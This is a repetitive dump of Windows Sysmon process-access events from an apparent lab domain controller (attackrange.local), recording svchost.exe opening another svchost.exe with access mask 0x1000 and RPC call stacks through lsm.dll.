13:58:21.149{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.149{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.149{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.149{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.149{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.149{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.149{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.149{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 